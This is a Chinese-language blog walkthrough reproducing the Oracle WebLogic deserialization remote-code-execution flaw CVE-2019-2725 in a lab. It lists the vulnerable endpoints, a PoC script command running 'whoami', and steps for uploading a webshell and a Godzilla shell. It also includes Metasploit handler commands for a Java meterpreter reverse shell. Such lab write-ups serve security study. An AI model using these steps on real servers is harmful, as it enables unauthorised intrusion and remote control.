weblogic反序列化漏洞复现( CVE-2019-2725)

Posted 星球守护者

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了weblogic反序列化漏洞复现( CVE-2019-2725)相关的知识,希望对你有一定的参考价值。

漏洞名称

  • weblogic反序列化远程命令执行漏洞

漏洞编号

  • CVE-2019-2725

漏洞描述

  • CVE-2019-2725是一个Oracle weblogic反序列化远程命令执行漏洞,

  • 这个漏洞依旧是根据weblogic的xmldecoder反序列化漏洞,

  • 通过针对Oracle官网历年来的补丁构造payload来绕过。

影响版本

  • weblogic 10.x
  • weblogic 12.1.3

漏洞存在

/_async/AsyncResponseService
/_async/AsyncResponseServiceJms
/_async/AsyncResponseServiceHttps
/_async/AsyncResponseServiceSoap12
/_async/AsyncResponseServiceSoap12Jms
/_async/AsyncResponseServiceSoap12Https

http://192.168.253.143:7001/_async/AsyncResponseService

http://192.168.253.143:7001/_async/# 返回403则存在,返回404则不存在

复现

第一步 访问控制台

http://192.168.253.143:7001/console/login/LoginForm.jsp

第二步 使用weblogicScan进行扫描,发现存在该漏洞

漏洞复现一(poc)

执行命令:

python weblogic-2019-2725.py 10.3.6 http://192.168.253.143:7001 whoami


上传webshell



漏洞复现二

下载地址

https://github.com/shack2/javaserializetools/releases/tag/1.0.20190828

漏洞检查

命令执行

上传哥斯特马,并进行连接



哥斯特与msf联动

kali中msfconsole
use exploit/multi/handler
set payload  /java/meterpreter/reverse_tcp
set lhost
set lport
run


笔记下载

https://download.csdn.net/download/qq_41901122/54162206

免责声明

本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!

以上是关于weblogic反序列化漏洞复现( CVE-2019-2725)的主要内容,如果未能解决你的问题,请参考以下文章

Weblogic反序列化命令执行漏洞(CVE-2018-2628)复现

安全-Weblogic 小于10.3.6版本WLS组件反序列化漏洞复现(vulhub)

Weblogic(CVE-2017-10271)漏洞复现

Vulhub漏洞系列:Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

Weblogic反序列化漏洞(CVE-2019-2725)

Weblogic反序列化漏洞(CVE-2019-2725)